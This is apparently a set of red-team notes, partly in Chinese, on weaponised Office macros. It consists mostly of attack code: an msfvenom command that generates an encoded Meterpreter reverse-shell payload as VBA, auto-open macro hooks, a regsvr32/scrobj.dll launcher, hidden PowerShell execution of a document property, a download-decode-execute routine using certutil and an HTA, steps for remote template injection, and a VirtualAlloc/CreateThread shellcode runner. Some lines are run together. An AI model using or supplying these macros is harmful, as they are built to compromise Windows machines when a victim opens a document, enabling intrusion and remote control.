└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -f vba-psh > vba[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of vba-psh file: 7590 bytes
Public alreadyLaunched As Integer
Private Sub Malware()'
' ============================================
' Enter here your malware code here.' It will be started on auto open surely.
'' ============================================
MsgBox ("Here comes the malware!")
' ============================================
End Sub
Private Sub Launch()If alreadyLaunched = True Then
Exit Sub
alreadyLaunched = True
End Sub
Private Sub SubstitutePage()'
' This routine will take the entire Document's contents,
' delete them and insert in their place contents defined in
' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
Dim doc As Word.Document
Dim firstPageRange As Range
Dim rng As Range
Dim autoTextTemplateName As String
' This is the name of the defined AutoText prepared in the document,
' to be inserted in place of previous contents.
autoTextTemplateName = "这是一个图文集"Set firstPageRange = Word.ActiveDocument.Range
Selection.Delete Unit:=wdCharacter, Count:=1
Set doc = ActiveDocument
Set rng = doc.Sections(1).Range
doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
End Sub
Sub AutoOpen()' Becomes launched as first on MS Word
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
End Sub
Sub Auto_Open()' Becomes launched as first on MS Excel
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
End Sub
Private Sub Document_Open()
End Sub
Private Sub DocumentOpen()
End Sub
Private Sub Auto_Open()
End Sub
Private Sub AutoOpen()
End Sub
Private Sub Auto_Exec()
End Sub
Private Sub Test()
Dim shell
Dim out
Set shell = VBA.CreateObject("WScript.Shell")
out = shell.Run("regsvr32 /u /n /s /i: scrobj.dll", 0, False)End Sub
Private Sub Workbook_Open()
Dim author As String
author = ActiveWorkbook.BuiltinDocumentProperties("Author")
Dim ws As Object
Set ws = CreateObject("WScript.Shell")
With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -").StdIn.WriteLine author
.StdIn.WriteBlankLines 1
End With
End Sub
Sub DownloadAndExec()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET","", False
With bStrm
.Type = 1
.write xHttp.responseBody
.savetofile "encoded.crt", 2
End With
Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")End Sub
制作模板注入只需要将当前Word文档重命名为.zip后缀并解压,然后进入到word目录下的_rels目录,打开document.xml.rels文件并找到一个空闲的 Id 值,例如 rId10,然后在 Relationships 标签内添加一个新的 Relationship 标签即可:
Private Declare PtrSafe Function CreateThread Lib "KERNEL32"(ByVal SecurityAttributes
As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As
LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32"(ByVal lpAddress As
LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As
Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32"(ByVal lDestination As
LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
buf = Array(shellcode array)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)For counter = LBound(buf) To UBound(buf)data = buf(counter)
res = RtlMoveMemory(addr + counter,data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)EndFunction
